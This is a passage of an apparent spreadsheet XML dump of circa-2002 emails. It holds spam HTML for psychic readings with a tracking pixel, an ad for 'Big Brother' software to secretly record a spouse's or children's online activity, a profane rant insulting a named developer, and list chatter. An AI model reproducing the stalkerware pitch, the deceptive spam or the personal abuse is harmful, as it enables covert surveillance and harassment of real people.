 f"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
       &lt;/font&gt;&lt;p align=3D"Center"&gt;&lt;b&gt;&lt;font color=3D"#ffffff" size=3D"2" fac=
 e=3D"Tahoma"&gt;Your
       email address was obtained from an opt-in list. Opt-in MRSA List
       &amp;nbsp;Purchase Code # 312-1-010.&amp;nbsp;&amp;nbsp;If you wish to be unsubs=
 cribed
       from this list, please &lt;a href=3D"http://www.deal2002.com/removeme.h=
 tml"&gt;
     &lt;font color=3D"#FFFFFF"&gt;CLICK HERE&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Oh ma gawd - funny site of the day...
</t>
  </si>
  <si>
    <t xml:space="preserve">This is for those that have interacted with D Winer
 "Dave's idea of love is fucking everyone else without so much as a reach
 around.  You're supposed to just shut up and take it."
 http://winerlog.inspiredsites.net/
 ===========
 Who's the real monster?
 It seems good Ol' Uncle Dave is once again trying to savage anyone that
 dares to disagree with him.  It seems Ben, Kevin and Bill are making too
 strong a case.  So here we Dave's attempt to fool you into thinking they're
 some sort of monsters, violent ones no less.
 Anyone who works with Hemenway or Kearney should be aware that these people
 are nothing less than monsters, who will stoop to any level to get their
 way.
 Yeah sure Dave, whatever you need to believe.
 The truth is these folks do a fine job of actually helping others and
 improving RSS in general.  Each with their own brand of attitude, to be
 sure, but they seem to be pretty focused on actually helping things move
 forward.  How is that being monstrous?
 Is Dave trying to slander their good names and thus poison the public's
 perception of them?  If you haven't already, contact them and ask them how
 they feel about this foolishness.
  9/18/02; 10:07:38 AM - Discuss
 Dave deflects what he can't take the time to understand
 It's really quite pitiful.  When normal people don't understand something
 they usually try learning about it.  They read up, ask questions and seek
 the help of those that understand it.  This before shooting their mouths off
 and looking like fools.
 What Dave does is just the opposite.
 Posts a link to something he doesn't understand
 Get's a bunch of e-mail from people who do understand it
 Derides the idea as being 'too much trouble' and blogs it.
 Expects others to do research for him
 Abuses anyone who tries to help him
 Pontificates, incorrectly, about only part of the issue
 Realizes he's been a fool but refuses to correct himself
 Plods forward pedantically trying to defend his idiocy
 Tries making the educated people look like fools.
 Sends private e-mails to them trying to scare them off.
 Exposes any private e-mail they write, out of context.
 Deflects and runs off to some new topic, repeats from #1
 His continued diatribes about RSS-1.0 and it's use of RDF reveal this to be
 true.  Dave doesn't get the idea of the semantic web.  He'd rather have you
 follow his stupid ideas than dare admit that the work of others is worth
 trying.
 One reader wrote to us with a good analogy.  "It's like that movie The
 Poseidon Adventure.  Dave's like the purser ranting and raving that the
 passengers should follow him and march toward the bow.  I don't know about
 you but I'd rather be with the fat lady swimming toward the engine room.
 The ship's fucking sinking and I don't want to be following the idiot."
 Dave's idea of love is fucking everyone else without so much as a reach
 around.  You're supposed to just shut up and take it.  After all, why would
 good ol' Uncle Dave want to hurt you?  It's all about love, right?  To hell
 with asking you if you want to get shafted.  And if you dare complain, he
 savages you.  Then he tries to make everyone think you're the one causing
 all the trouble.
 We've news for you Dave, we're wise to your tactics and we're talking
 amongst ourselves about it.  We're routing around you damaging behavoir.
 That's where we're coming from.
 If you have an example of how you've tried to help Dave, please drop us an
 e-mail about it.  We'll keep it strictly confidential of course.  Send it
 along to zaphod@egroups.com
  9/12/02; 10:13:11 AM - Discuss
 Trying to talk with Dave is like trying to wrestle a pig...
 The trouble is, you get dirty and the pig seems to like it.
 Another developer tries talking to Dave and discovers it's fundamentally
 impossible:
 His basic response was just that RDF was a joke and the Semantic Web
 developers are doing a terrible job.
 In the span of less than five minutes Dave makes such an ass of himself that
 people at other tables start whispering "that guy is an idiot..."
 The zaphodim, however, are veteran pig wrestlers.  If you've got a similar
 tale from the mud pit, be sure to drop us a line at: zaphod@egroups.com.
  9/11/02; 2:17:58 PM - Discuss (1 response)
 Aha! Some backing down by the whining one?
 It would appear the 'dictator release' strategy that Dave's been trying on
 his crappy little set of RSS hacks is failing to gain support.
 I'm going to push back the caveat-removing on the 2.0 spec by 24 hours.
 Still have work to do on the sample file, I want to look into the RFC for
 time-date specs, and get started on the Radio implementation of 2.0. I have
 to prepare for Seybold tomorrow, and I want to a little memorial for 9-11. A
 busy few days for a guy still recovering. Also, it would be great if people
 who make content tools could review the 2.0 spec and see if there are any
 deal-stoppers.
 Hell yeah there are deal stoppers, like nobody wants it nor will they use
 it!
 The poor Radio customers!  The poor Salon blog users!  They're going to be
 dragged unwillingly into producing XML content that nobody will use!  So
 with the flip of his mighty upgrade switch Dave is going to turn all their
 content into totally unsupported garbage!!!
 Ya better speak up now folks otherwise your content is going to start
 getting rejected!
 Of course at the same time Dave tries to play the sympathy card.  What utter
 fucking nonsense.  This past weekend, the blogosphere excoriates him for his
 'blame America' bullshit.  Then the RSS community tells him to get stuffed
 with his dictator release of RSS.  Now he's trying to pretend we should be
 nice to him because he's still recovering?
 Uh, Dave, if you want to take a rest from the battle then stop picking
 fights.  We'll still kick your ass regardless.  That's what years of your
 abusing people has gotten you Dave.  No sympathy anymore, none whatsoever.
  9/11/02; 1:56:10 PM - Discuss
 Dave is Scary on 9/11
 Posted on Scripting News on 9/10/2002:
 Note: During the day tomorrow there will be no updates to Scripting News.
 I'll be in SF at Seybold, leading a discussion on Web Services for
 Publishing with people from Amazon, Apple, Google and Jake Savin of
 UserLand. I may be able to update my Radio weblog, but only if there's
 something really important to report. So best wishes for a happy and safe
 9-11.
 What kind of asshole wishes people a happy 9/11??!?!?!?!??!! Obviously
 someone who doesn't have a clue nor lost anyone in the tragedy.
  9/11/02; 7:56:06 AM - Discuss
 Yeow and we though we were harsh!
 Wow, apparently Dave's sticking his neck out quite far these days.  Craig
 Schamp practically keel-hauls him with this one.  He wraps it up with:
 The man seems to show over and over that he's nothing more than a whining
 buffoon
 Give that man an honorary Zaphodim membership card and secret decoder ring!
 Related links over at PhotoDude, Richard Bennett, Andrea Harris, Reid Stott,
 Jeff Jarvis, Ipse Dixit, and the Fat Guy.
  9/9/02; 12:29:45 PM - Discuss
 RSS 2.0: code name "Hitler"
 If Dave tries to steamroll RSS 2.0 through without formal community
 consensus, here now we call it the "Hitler" release of 2.0.
 "No objections"?  No, he means "No objections I choose to hear."
 Dave is simply not listening.  People are objecting all over.
  9/6/02; 9:00:02 AM - Discuss
 Referral log funnies
 Every now and then we check the referral logs to see what's pointing back to
 us.  We sincerely apologize to the pool soul that used this search.
  9/5/02; 12:15:07 PM - Discuss
 Luserland Attempts to Trademark "RSS"
 Dave has waxed and waned about intellectual property rights and how any
 BigCo that tries to patent its technology or methods is corrupt or morally
 bankrupt. Scripting News is full of examples.
 So we found it surprising, as did many others, when Luserland software tried
 to patent the term 'RSS' back in 2000. Here's the patent application:
 http://tarr.uspto.gov/servlet/tarr?regser=serial&amp;entry=78025336
 This was apparently just between the start of the RSS 1.0 development
 efforts, and the publication of the specification. Winer knew about the RSS
 1.0 stuff - indeed, he complained about it bitterly at the time.
 Could Dave be any more transparent?!?!??!?!!!!!!!
 Since when has Dave been required to follow anything he says he wants others
 to do??? A good quote from before he filed the patent application:
 Tim O'Reilly says patents are OK, he's just against stupid patents. In the
 spirit of Touch of Grey, Tim man, patents are lock-in of the worst kind.
 There's no way to route around them.
  9/4/02; 6:06:51 AM - Discuss
 When's a Permalink not a Permalink?
 When Dave writes an item, then removes it!!!!!!!!!!! The permalink links to
 nothing at that point. So apparently the "perma-" part in permalink is
 permanent. For everyone except Dave. Too bad his little attempt at a
 definition fails to mention this...!!!!!!!!!
  9/2/02; 6:16:03 PM - Discuss
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: This is where it all begins
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="content-type" content="text/html;charset=iso-8859-1"&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="white" link="#043bc0" alink="#ffcc00" vlink="#043bc0"&gt;
 		&lt;center&gt;
 	&lt;table border="0" cellpadding="0" cellspacing="0" width="500"&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="1" rowspan="3" bgcolor="#043bc0"&gt;&lt;img height="1" width="1" src="../email1/shim.gif"&gt;&lt;/td&gt;
 	&lt;td width="500"&gt;
 	&lt;table border="0" cellpadding="0" cellspacing="0" width="500"&gt;
 	&lt;tr&gt;
 	&lt;td&gt;&lt;/td&gt;
 	&lt;td&gt;&lt;a href="http://psychicweb.com/p1"&gt;&lt;img height="109" width="364" src="http://65.162.84.5/images/051202_001_1.gif" border="0"&gt;&lt;img height="109" width="136" src="http://65.162.84.5/images/051202_001_2.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;/td&gt;
 	&lt;td width="1" rowspan="3" bgcolor="#043bc0"&gt;&lt;img height="1" width="1" src="../email1/shim.gif"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 	&lt;td&gt;
 	&lt;center&gt;
 		&lt;table border="0" cellpadding="0" cellspacing="0" width="100%"&gt;
 		&lt;tr valign="top"&gt;
 		&lt;td width="15"&gt;&lt;/td&gt;
 		&lt;td&gt;&lt;a href="http://psychicweb.com/p1"&gt;&lt;font face="Verdana" size="2" color="#0099ff"&gt;&lt;b&gt;&lt;br&gt;
 &lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="2" color="black"&gt;No where else will you find the level of accuracy, detail and convenience.&lt;/font&gt;&lt;a href="http://psychicweb.com/p1"&gt;&lt;font face="Verdana" size="2" color="#0099ff"&gt;&lt;b&gt;&lt;br&gt;
 		&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;a href="http://psychicweb.com/p1"&gt;&lt;font face="Verdana" size="2" color="#043bc0"&gt;&lt;b&gt;&lt;br&gt;
 ACT NOW!&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="2" color="#8900e5"&gt; &lt;/font&gt;&lt;font face="Verdana" size="2" color="black"&gt;you'll receive &lt;b&gt;Unlimited Access&lt;/b&gt; to our World Famous Psychics with &lt;b&gt;No Per Minute Charges!!!&lt;/b&gt;&lt;br&gt;
 		&lt;/font&gt;&lt;a href="http://psychicweb.com/p1"&gt;&lt;font face="Verdana" size="2" color="#0099ff"&gt;&lt;b&gt;&lt;br&gt;
 		&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="2"&gt;&lt;b&gt;But's that's not all...&lt;/b&gt;&lt;/font&gt;&lt;font face="Verdana" size="2"&gt;you also get unlimited Tarot and Rune readings, real-time Biorhythm charts, full in-depth Numerology reports, detailed Daily &amp;amp; Monthly Horoscopes, real-time Natal Charts, a Love Analyzer, Ouija Board, and much, much more!&lt;/font&gt;&lt;a href="http://psychicweb.com/p1"&gt;&lt;font face="Verdana" size="2" color="#8900e5"&gt;&lt;b&gt;&lt;br&gt;
 		&lt;br&gt;
 		&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="2" color="black"&gt;Your future is waiting &lt;/font&gt;&lt;a href="http://psychicweb.com/p1"&gt;&lt;font face="Verdana" size="2" color="#043bc0"&gt;&lt;b&gt;CLICK HERE&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="2" color="black"&gt; !!!&lt;br&gt;
 		&lt;br&gt;&lt;br&gt;
 		&lt;/font&gt;&lt;/td&gt;
 		&lt;td width="13"&gt;&lt;/td&gt;
 		&lt;td width="160"&gt;&lt;font face="Verdana" size="2" color="#0099ff"&gt;&lt;br&gt;
 		&lt;/font&gt;&lt;font face="Verdana" size="2" color="#043bc0"&gt;&amp;#149;&lt;/font&gt;&lt;font face="Verdana" size="2" color="#0099ff"&gt;&amp;nbsp;&lt;/font&gt;&lt;font face="Verdana" size="2" color="black"&gt;Live Psychics 24/7&lt;br&gt;
 		&lt;/font&gt;&lt;font face="Verdana" size="2" color="#043bc0"&gt;&amp;#149;&lt;/font&gt;&lt;font face="Verdana" size="2" color="#0099ff"&gt;&amp;nbsp;&lt;/font&gt;&lt;font face="Verdana" size="2" color="black"&gt;Numerology&lt;br&gt;
 		&lt;/font&gt;&lt;font face="Verdana" size="2" color="#043bc0"&gt;&amp;#149;&lt;/font&gt;&lt;font face="Verdana" size="2" color="#0099ff"&gt;&amp;nbsp;&lt;/font&gt;&lt;font face="Verdana" size="2" color="black"&gt;Horoscopes&lt;br&gt;
 		&lt;/font&gt;&lt;font face="Verdana" size="2" color="#043bc0"&gt;&amp;#149;&lt;/font&gt;&lt;font face="Verdana" size="2" color="#0099ff"&gt;&amp;nbsp;&lt;/font&gt;&lt;font face="Verdana" size="2" color="black"&gt;Astrology&lt;br&gt;
 		&lt;/font&gt;&lt;font face="Verdana" size="2" color="#043bc0"&gt;&amp;#149;&lt;/font&gt;&lt;font face="Verdana" size="2" color="#0099ff"&gt;&amp;nbsp;&lt;/font&gt;&lt;font face="Verdana" size="2" color="black"&gt;The Tarot&lt;br&gt;
 		&lt;/font&gt;&lt;font face="Verdana" size="2" color="#043bc0"&gt;&amp;#149;&lt;/font&gt;&lt;font face="Verdana" size="2" color="#0099ff"&gt;&amp;nbsp;&lt;/font&gt;&lt;font face="Verdana" size="2" color="black"&gt;Biorhythms&lt;br&gt;
 		&lt;/font&gt;&lt;font face="Verdana" size="2" color="#043bc0"&gt;&amp;#149;&lt;/font&gt;&lt;font face="Verdana" size="2" color="#0099ff"&gt;&amp;nbsp;&lt;/font&gt;&lt;font face="Verdana" size="2" color="black"&gt;I Ching&lt;br&gt;
 		&lt;/font&gt;&lt;font face="Verdana" size="2" color="#043bc0"&gt;&amp;#149;&lt;/font&gt;&lt;font face="Verdana" size="2" color="#0099ff"&gt;&amp;nbsp;&lt;/font&gt;&lt;font face="Verdana" size="2" color="black"&gt;Runes&lt;br&gt;
 		&lt;/font&gt;&lt;font face="Verdana" size="2" color="#043bc0"&gt;&amp;#149;&lt;/font&gt;&lt;font face="Verdana" size="2" color="#0099ff"&gt;&amp;nbsp;&lt;/font&gt;&lt;font face="Verdana" size="2" color="black"&gt;and so much more!&lt;br&gt;
 		&lt;/font&gt;&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/center&gt;
 	&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 	&lt;td height="1" bgcolor="#043bc0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;/center&gt;
 &lt;p&gt;&lt;font size=-1 color=black&gt;This email is not sent unsolicited. You are opted in with CNN-SI. You are receiving it because you requested receive this email by opting-in with our marketing partner. You will receive notices of exciting offers, products, and other options! However, we are committed to only sending to those people that desire these offers. If you do not wish to receive such offers 
 &lt;a href="http://65.162.84.5/perl/unsubscribe.pl?s=20020512182829000001697911"&gt;&lt;b&gt;&lt;font size="-1" color = blue&gt;Click Here.&lt;/font&gt;&lt;/b&gt;&lt;/a&gt; or paste the following into any browser:&lt;/p&gt; http://65.162.84.5/perl/unsubscribe.pl?s=20020512182829000001697911 &lt;br&gt;&lt;br&gt;&lt;p&gt; to remove your email name from our list. You may contact our company by mail at 1323 S.E. 17th Street, Suite Number 345, Ft. Lauderdale, Fl 33316&lt;/p&gt; 
 &lt;img src="http://65.162.84.5/perl/r_open1.pl?serialno=20020512182829000001697911"&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-08-28
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 .NET and Perl, Working Together
     posted by pudge on Tuesday August 27, @09:17 (links)
     http://use.perl.org/article.pl?sid=02/08/27/1317253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</si>
  <si>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&gt;&gt;&gt;&gt;&gt; "J" == Joseph S Barrera, &lt;Joseph&gt; writes:
     J&gt; There are so many good musician jokes.  
 I'd resisted after the first post, but now?
 Ok, two musicians and a banjo player walk into a music store ...
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Clawhammer Banjo,  Mandolin, Fiddle,  Mountain Dulcimer, Guitar, Bodhran
 "You don't play what you know; you play what you hear." ---- Miles Davis
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Re[2]: Bukkake
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; James Rogers:
 &gt; &gt;I don't think there is a specific word in English
 &gt; &gt;for eye goop.
 &gt; 
 &gt; "Sleep. n. .. 3. A crust of dried tears or mucus
 &gt; normally forming around the inner rim of the eye
 &gt; during sleep."
 &gt; 
 &gt; But I think muta is a fine word for it.
 Muta is good but if Bukkake is not eye goop, then what is? 
 B
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Secretly Record all internet activity on any computer... C
</t>
  </si>
  <si>
    <t xml:space="preserve">FIND OUT WHO THEY ARE CHATTING/E-MAILING WITH ALL THOSE HOURS!
 Is your spouse cheating online? 
 Are your kids talking to dangerous people on instant messenger?
 Find out NOW! - with Big Brother instant software download.
 Click on this link NOW to see actual screenshots and to order!
 http://213.139.76.142/bigbro/index.asp?Afft=M30
 To be excluded from future contacts please visit:
 http://213.139.76.69/PHP/remove.php
 jthomason
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: "Holiday Season" 2002 begins
</t>
  </si>
  <si>
    <t xml:space="preserve">Eirikur Hallgrimsson wrote:
 &gt; It's official, the holidays are here.
 For which year, 2003 or 2004?
 - Joe
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET: Why I don't use firewalls
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;Message Boards Dispatch&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;a href="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=442 colspan=4&gt;
 		&lt;img src="http://www.cnet.com/i/nl/mb/hd.gif" width="442" height="60" border="0" alt="CNET Message Boards Newsletter"&gt;&lt;br&gt;
 			&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
 				&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img src="/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td width=10 rowspan=2&gt;&lt;img src="/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td  width=430&gt;&lt;img src="/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
       		&lt;/table&gt;	
 	&lt;/td&gt;
 &lt;!-- Skyscraper column --&gt;
 	&lt;td width=160 rowspan=2&gt;
 		&lt;img src="http://a.r.tv.com/cnet.1d/i/dp/dd_b.gif" width="160" height="18" border="0"&gt;&lt;br&gt;
 		&lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
 		&lt;/table&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;p&gt;
 &lt;!-- search form --&gt;
 &lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;&lt;form method=get action="http://www.search.com/redirect"&gt;
 &lt;tr valign=top&gt;&lt;td&gt;&lt;font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value="http://xlink.zdnet.com/cgi-bin/texis/forums/forums/search.html/+/cnet/?Utext=%%q%%&amp;subcat=&amp;cobrand=cnet&amp;template=cnetnt&amp;Usch=5&amp;ROS=1"&gt;Messages
  &lt;option value="http://cnet.search.com/search?tag=ex.messageboards.dispatch.srch.cnet"&gt;All CNET
  &lt;option value="http://www.search.com/search?tag=ex.messageboards.dispatch.srch.web"&gt;The Web
 &lt;/select&gt;&amp;nbsp;&lt;input type=submit value="Go!"&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;
                 &lt;!-- Top 10 Forums --&gt;
 				&lt;img src="http://www.cnet.com/i/nl/mb/rhc_top10.gif" alt="More Forums" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="150" border=0 cellpadding=2 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;1. &lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMBGSCwwapFigi7yr9FKgnR" &gt;Wireless&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;2. &lt;a href="http://clickthru.online.com/Click?q=af--dB8QLpqkpcxumpydDX7NdmUVSeR" &gt;Computer Help&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;3. &lt;a href="http://clickthru.online.com/Click?q=c4-Iy9lQ0Ww9Y9U-2nkHF6q-jPexAyR" &gt;Speakeasy&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;4. &lt;a href="http://clickthru.online.com/Click?q=d9-b7L_QpPwBYBIqVdie23s1N87hJlR" &gt;Windows 98&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;5. &lt;a href="http://clickthru.online.com/Click?q=ee-ZbmWQwDkHn0q89j0QzbMuLbLad4R" &gt;PC Hardware&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;6. &lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rzzAoIotPhKQcaLlAI6OrR" &gt;Windows Me&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;7. &lt;a href="http://clickthru.online.com/Click?q=18-WhdzI98qBTkksDJTiMEyR1N675iR" &gt;Computer Newbies&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;8. &lt;a href="http://clickthru.online.com/Click?q=2d-OxQyIbKH-e5wuFLVdngyV7VDjSPR" &gt;Downloads&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;9. &lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAEL8g_rm9Z5VKc-3P0BcR" &gt;Windows XP&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;td width="100%"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;10.&lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHwfiu9CKYjKHbtbXYzHRR" &gt;Virus &amp; Security&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				&lt;!-- /Top 10 Forums --&gt;
  				 &lt;br&gt;
 				&lt;!-- Hot Products --&gt;
 				&lt;img src="http://www.cnet.com/i/nl/mb/rhc_hot.gif" alt="Hot Products" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="100%" border=0 cellpadding=3 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 				Check out the User Opinions on these Hot Products and then submit one of your own.&lt;br&gt;
 				&amp;nbsp;&lt;br&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 				&lt;font color="#CC000" size="-2"&gt;92%&amp;nbsp;&lt;/font&gt;&lt;img src="http://download.cnet.com/images/tu.gif" width=14 height=17 border=0 alt="User Opinions"&gt;&amp;nbsp;&lt;font color="#333333" size="-2"&gt;8%&lt;/font&gt;&lt;img src="http://download.cnet.com/images/td.gif" width=14 height=17&gt;&amp;nbsp;&lt;font size=-2&gt;(3629 votes)&lt;/font&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEIKM8v1-j7Bc1bJBykEmZR" &gt;RAMBooster&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Downloads: Optimizers &amp;amp; Diagnostics&lt;/font&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 				&lt;font color="#CC000" size="-2"&gt;85%&amp;nbsp;&lt;/font&gt;&lt;img src="http://download.cnet.com/images/tu.gif" width=14 height=17 border=0 alt="User Opinions"&gt;&amp;nbsp;&lt;font color="#333333" size="-2"&gt;15%&lt;/font&gt;&lt;img src="http://download.cnet.com/images/td.gif" width=14 height=17&gt;&amp;nbsp;&lt;font size=-2&gt;(2878 votes)&lt;/font&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK1S0PJLXy6gJLkjCXMZHnR" &gt;ZoneAlarm&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Downloads: Security &amp;amp; Encryption&lt;/font&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 				&lt;font color="#CC000" size="-2"&gt;84%&amp;nbsp;&lt;/font&gt;&lt;img src="http://download.cnet.com/images/tu.gif" width=14 height=17 border=0 alt="User Opinions"&gt;&amp;nbsp;&lt;font color="#333333" size="-2"&gt;16%&lt;/font&gt;&lt;img src="http://download.cnet.com/images/td.gif" width=14 height=17&gt;&amp;nbsp;&lt;font size=-2&gt;(50 votes)&lt;/font&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M1Un6RJsC3V0z6qjySJGeR" &gt;VirusMD Family Webfilter 1.0&lt;/a&gt;&lt;br&gt;
